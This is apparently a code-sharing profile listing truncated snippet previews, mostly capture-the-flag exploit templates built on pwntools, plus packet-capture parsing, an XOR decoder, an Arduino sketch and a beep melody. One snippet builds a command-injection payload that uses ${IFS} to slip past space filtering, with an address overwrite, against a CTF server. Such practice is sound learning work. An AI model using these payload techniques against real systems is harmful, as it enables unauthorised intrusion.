SwissKid

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
from binascii import hexlify,unhexlify

# Set up pwntools for the correct architecture
exe = context.binary = ELF('./pilot')

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR

SwissKid

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF('scv')

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...

SwissKid

import scapy.all as scapy
import scapy_http.http
import urlparse
import binascii


p=scapy.rdpcap("cap.pcap")

xlist = []
##So we figured it was probably x because the "x" values were past the content length

SwissKid

#!/usr/bin/env python2
import re
import string
#f = open("encrypted", "rb")
#n = f.read()[:-1].decode("hex")
n = "274c10121a0100495b502d551c557f0b0833585d1b27030b5228040d3753490a1c025415051525455118001911534a0052560a14594f0b1e490a010c4514411e070014615a181b02521b580305170002074b0a1a4c414d1f1d171d00151b1d0f480e491e0249010c150050115c505850434203421354424c1150430b5e094d144957080d4444254643".decode("hex")

def xor(s1,s2):
    return ''.join(chr(ord(a) ^ ord(b)) for a,b in zip(s1,s2))

SwissKid

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *

# Set up pwntools for the correct architecture
context.update(arch='i386')
exe = './path/to/binary'

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR

SwissKid

Debug=False
if len(sys.argv) > 1:
    Debug=True
if Debug:
    conn = process(filename, aslr=False)
else:
    conn = remote("pwn.sect.ctf.rocks", 31337)

SwissKid

from pwn import *

conn = remote("pwn2.sect.ctf.rocks", 6666)
payload='pwd;cat flag;exit;#'
payload=payload.replace(" ","${IFS}")
payload+='A'* (512-len(payload))
payload+='date'+ '\xa4\x10\x60'
print("%r" % payload)

conn.sendline("0")

SwissKid

#!/usr/bin/env python
# Hack.lu 2010 CTF - Challenge #9 "Bottle"
# Extract iodine DNS tunnel data
# -- StalkR
from scapy.all import *
from subprocess import Popen,PIPE

input, output = "Triforce.pcap", "test_extracted.cap"
topdomain = ".angler.wetun.nl."
upstream_encoding = 128

SwissKid

//Initial bit stolen from http://elimelecsarduinoprojects.blogspot.com/2013/06/measure-rpms-arduino.html, though it was really just the wiring setup
volatile int rpmcount = 0;//see http://arduino.cc/en/Reference/Volatile
float rpm = 0;
unsigned long lastmillis = 0;
unsigned long millis2 = 0;
int rotTime = 0;
bool badOne = false; 
int dinostep = 0;
int userstep = 1;
int gameStart = false;

SwissKid

#!/bin/bash
beep -l 350 -f 392 -D 100 -n -l 350 -f 392 -D 100 -n -l 350 -f 392 -D 100 -n -l 250 -f 311.1 -D 100 -n -l 25 -f 466.2 -D 100 -n -l 350 -f 392 -D 100 -n -l 250 -f 311.1 -D 100 -n -l 25 -f 466.2 -D 100 -n -l 700 -f 392 -D 100 -n -l 350 -f 587.32 -D 100 -n -l 350 -f 587.32 -D 100 -n -l 350 -f 587.32 -D 100 -n -l 250 -f 622.26 -D 100 -n -l 25 -f 466.2 -D 100 -n -l 350 -f 369.99 -D 100 -n -l 250 -f 311.1 -D 100 -n -l 25 -f 466.2 -D 100 -n -l 700 -f 392 -D 100 -n -l 350 -f 784 -D 100 -n -l 250 -f 392 -D 100 -n -l 25 -f 392 -D 100 -n -l 350 -f 784 -D 100 -n -l 250 -f 739.98 -D 100 -n -l 25 -f 698.46 -D 100 -n -l 25 -f 659.26 -D 100 -n -l 25 -f 622.26 -D 100 -n -l 50 -f 659.26 -D 400 -n -l 25 -f 415.3 -D 200 -n -l 350 -f 554.36 -D 100 -n -l 250 -f 523.25 -D 100 -n -l 25 -f 493.88 -D 100 -n -l 25 -f 466.16 -D 100 -n -l 25 -f 440 -D 100 -n -l 50 -f 466.16 -D 400 -n -l 25 -f 311.13 -D 200 -n -l 350 -f 369.99 -D 100 -n -l 250 -f 311.13 -D 100 -n -l 25 -f 392 -D 100 -n -l 350 -f 466.16 -D 100 -n -l 250 -f 392